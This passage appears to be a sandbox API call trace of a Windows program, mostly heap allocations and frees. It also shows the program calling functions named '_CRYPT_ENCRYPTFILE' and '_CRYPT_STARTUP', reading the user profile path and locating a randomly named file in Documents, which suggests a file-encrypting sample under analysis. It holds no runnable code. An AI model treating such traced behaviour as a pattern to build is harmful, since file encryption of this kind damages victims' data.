[0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PSBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SBWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BWLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0266.698] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WLa.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="La.pps", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0266.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0266.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0266.699] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0266.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0266.700] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0266.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0266.700] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0266.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0266.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0266.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0266.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0266.701] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0266.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0266.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0266.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0266.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0266.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0266.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0266.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0266.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0266.703] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0266.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0266.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0266.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0266.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0266.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.705] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0266.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0266.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0266.706] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0266.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0266.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0266.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0266.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.707] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0266.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0266.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0266.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0266.708] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/pFCcGpVbcXPSBWLa.pps", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f59cac0, ftCreationTime.dwHighDateTime=0x1d5ef53, ftLastAccessTime.dwLowDateTime=0x311e1fb0, ftLastAccessTime.dwHighDateTime=0x1d5e669, ftLastWriteTime.dwLowDateTime=0x311e1fb0, ftLastWriteTime.dwHighDateTime=0x1d5e669, nFileSizeHigh=0x0, nFileSizeLow=0x142d7, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="pFCcGpVbcXPSBWLa.pps", cAlternateFileName="PFCCGP~1.PPS")) returned 0xa874d0 [0266.708] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0266.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.709] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0266.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0266.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0266.710] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0266.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0266.710] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 